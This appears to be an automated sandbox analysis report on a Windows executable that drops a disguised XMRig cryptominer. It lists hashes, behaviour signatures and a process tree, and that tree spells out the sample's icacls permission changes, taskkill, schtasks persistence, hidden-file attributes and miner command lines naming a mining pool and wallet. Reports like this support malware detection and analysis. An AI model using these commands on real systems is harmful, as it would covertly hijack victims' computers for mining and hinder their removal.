Analysis

  • max time kernel
    150s
  • max time network
    140s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    13/09/2024, 07:33

General

  • Target

    ddf6edbdb88c1fb6f8ce7e8285109710_JaffaCakes118.exe

  • Size

    4.6MB

  • MD5

    ddf6edbdb88c1fb6f8ce7e8285109710

  • SHA1

    c04ddbdc2cdbc1925b7544c3718270672c01a807

  • SHA256

    ec03f155bfdfa8c72f3bab882afe7b03d3d6898a8fb0a6a830c98d8ad39a348d

  • SHA512

    fdc7f527e745759a42605e5f116fd0085477925408fdd3c54313abff1c2cbb53acfe86544835af8d5437864cb4887f7aa2348a98ecf9fa3f9f49868618334def

  • SSDEEP

    98304:AVU6BHZRv4Meak0ZM0p2B6LwFKHXTjKzZXh5:+j9ZRQXn6cFSXT+z

Malware Config

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 6 IoCs
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 5 IoCs
  • Modifies file permissions 1 TTPs 6 IoCs
  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

  • Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Kills process with taskkill 2 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 44 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ddf6edbdb88c1fb6f8ce7e8285109710_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\ddf6edbdb88c1fb6f8ce7e8285109710_JaffaCakes118.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2700
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c icacls "C:\ProgramData\SecurityEssentials" /inheritance:e /grant "*S-1-1-0:(R,REA,RA,RD)" & icacls "C:\ProgramData\SecurityEssentials" /inheritance:e /grant "*S-1-5-7:(R,REA,RA,RD)" & icacls "C:\ProgramData\SecurityEssentials" /inheritance:e /grant "admin:(R,REA,RA,RD)"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1136
      • C:\Windows\system32\icacls.exe
        icacls "C:\ProgramData\SecurityEssentials" /inheritance:e /grant "*S-1-1-0:(R,REA,RA,RD)"
        3⤵
        • Modifies file permissions
        PID:4196
      • C:\Windows\system32\icacls.exe
        icacls "C:\ProgramData\SecurityEssentials" /inheritance:e /grant "*S-1-5-7:(R,REA,RA,RD)"
        3⤵
        • Modifies file permissions
        PID:1144
      • C:\Windows\system32\icacls.exe
        icacls "C:\ProgramData\SecurityEssentials" /inheritance:e /grant "admin:(R,REA,RA,RD)"
        3⤵
        • Modifies file permissions
        PID:4716
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c taskkill /F /IM SecurityHealthTray.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:860
      • C:\Windows\system32\taskkill.exe
        taskkill /F /IM SecurityHealthTray.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:3728
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c RMDIR /S /Q C:\ProgramData\SecurityEssentials
      2⤵
      PID:2644
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c taskkill /F /IM SecurityHealthTray.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3968
      • C:\Windows\system32\taskkill.exe
        taskkill /F /IM SecurityHealthTray.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:2368
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c RMDIR /S /Q C:\ProgramData\SecurityEssentials
      2⤵
      PID:4268
    • C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN Windows\x86_microsoft-windows-fsrm-common_31bf3256ad364e35_10.0.18372.1_none_3fed101f25aae892\MicrosoftSecurityEssentials /XML "C:\ProgramData\SecurityEssentials\task.xml"
      2⤵
      • Scheduled Task/Job: Scheduled Task
      PID:4980
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c ATTRIB +h +s +r "C:\ProgramData\SecurityEssentials" & ATTRIB +h +s +r "C:\ProgramData\SecurityEssentials\SecurityHealthTray.exe"& ATTRIB +h +s +r "C:\ProgramData\SecurityEssentials\task.xml"
      2⤵
      • Hide Artifacts: Hidden Files and Directories
      • Suspicious use of WriteProcessMemory
      PID:2180
      • C:\Windows\system32\attrib.exe
        ATTRIB +h +s +r "C:\ProgramData\SecurityEssentials"
        3⤵
        • Views/modifies file attributes
        PID:2676
      • C:\Windows\system32\attrib.exe
        ATTRIB +h +s +r "C:\ProgramData\SecurityEssentials\SecurityHealthTray.exe"
        3⤵
        • Views/modifies file attributes
        PID:4548
      • C:\Windows\system32\attrib.exe
        ATTRIB +h +s +r "C:\ProgramData\SecurityEssentials\task.xml"
        3⤵
        • Views/modifies file attributes
        PID:4696
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c DEL /F /Q C:\ProgramData\SecurityEssentials\task.xml
      2⤵
      PID:4612
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c icacls "C:\ProgramData\SecurityEssentials" /inheritance:e /deny "*S-1-1-0:(R,REA,RA,RD)" & icacls "C:\ProgramData\SecurityEssentials" /inheritance:e /deny "*S-1-5-7:(R,REA,RA,RD)" & icacls "C:\ProgramData\SecurityEssentials" /inheritance:e /deny "admin:(R,REA,RA,RD)"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3856
      • C:\Windows\system32\icacls.exe
        icacls "C:\ProgramData\SecurityEssentials" /inheritance:e /deny "*S-1-1-0:(R,REA,RA,RD)"
        3⤵
        • Modifies file permissions
        PID:4252
      • C:\Windows\system32\icacls.exe
        icacls "C:\ProgramData\SecurityEssentials" /inheritance:e /deny "*S-1-5-7:(R,REA,RA,RD)"
        3⤵
        • Modifies file permissions
        PID:4416
      • C:\Windows\system32\icacls.exe
        icacls "C:\ProgramData\SecurityEssentials" /inheritance:e /deny "admin:(R,REA,RA,RD)"
        3⤵
        • Modifies file permissions
        PID:3516
  • C:\ProgramData\SecurityEssentials\SecurityHealthTray.exe
    C:\ProgramData\SecurityEssentials\SecurityHealthTray.exe
    1⤵
    • Checks computer location settings
    • Executes dropped EXE
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:3644
    • C:\ProgramData\SecurityEssentials\SecurityHealthTray.exe
      "C:\ProgramData\SecurityEssentials\SecurityHealthTray.exe" --max-cpu-usage=10 -o pool.hashvault.pro:5555 -u 83GTGcroaPp62ba8bLofMeCvfswfuLyiS8vQv1Pq7gLU69pUo9jchLhJzXR6TSsDLsDoeWm6awZbPTRyumYopDxeScQVAsN -p x --rig-id={afdcdefbefe}
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:4444
      • C:\ProgramData\SecurityEssentials\SecurityHealthTray.exe
        "C:\ProgramData\SecurityEssentials\SecurityHealthTray.exe" --max-cpu-usage=50 -o pool.hashvault.pro:5555 -u 83GTGcroaPp62ba8bLofMeCvfswfuLyiS8vQv1Pq7gLU69pUo9jchLhJzXR6TSsDLsDoeWm6awZbPTRyumYopDxeScQVAsN -p x --rig-id={afdcdefbefe}
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: GetForegroundWindowSpam
        • Suspicious use of AdjustPrivilegeToken
        PID:4764
  • C:\ProgramData\SecurityEssentials\SecurityHealthTray.exe
    C:\ProgramData\SecurityEssentials\SecurityHealthTray.exe
    1⤵
    • Executes dropped EXE
    PID:864
  • C:\ProgramData\SecurityEssentials\SecurityHealthTray.exe
    C:\ProgramData\SecurityEssentials\SecurityHealthTray.exe
    1⤵
    • Executes dropped EXE
    PID:3108

Network

MITRE ATT&CK Enterprise v15


Downloads

  • C:\ProgramData\SecurityEssentials\task.xml

    Filesize

    1KB

    MD5

    75d36f991d4b31e7403d029ef1090309

    SHA1

    1dc4298c779cd92fbb9acd581eb22cc673c8db0f

    SHA256

    daf142a796681e4d72cbc457a06cd8e3ce78a523d512312a1305cc3b23b8a4d6

    SHA512

    57ab436000a3b404d0f18f293a95a2c0b72d429309039315675dd5b48537ff5195bf7ab022d86b2fb7f0129c612fa4b3d90f1196d996a1ceac3f680f6c1599d3

  • memory/864-31-0x00007FF7700A0000-0x00007FF770D9E000-memory.dmp

    Filesize

    13.0MB

  • memory/2700-0-0x00007FF6118D0000-0x00007FF6125CE000-memory.dmp

    Filesize

    13.0MB

  • memory/2700-4-0x0000020D463E0000-0x0000020D463F4000-memory.dmp

    Filesize

    80KB

  • memory/3108-37-0x00007FF7700A0000-0x00007FF770D9E000-memory.dmp

    Filesize

    13.0MB

  • memory/3644-13-0x00007FF7700A0000-0x00007FF770D9E000-memory.dmp

    Filesize

    13.0MB

  • memory/4444-19-0x00007FF7700A0000-0x00007FF770D9E000-memory.dmp

    Filesize

    13.0MB

  • memory/4764-25-0x00007FF7700A0000-0x00007FF770D9E000-memory.dmp

    Filesize

    13.0MB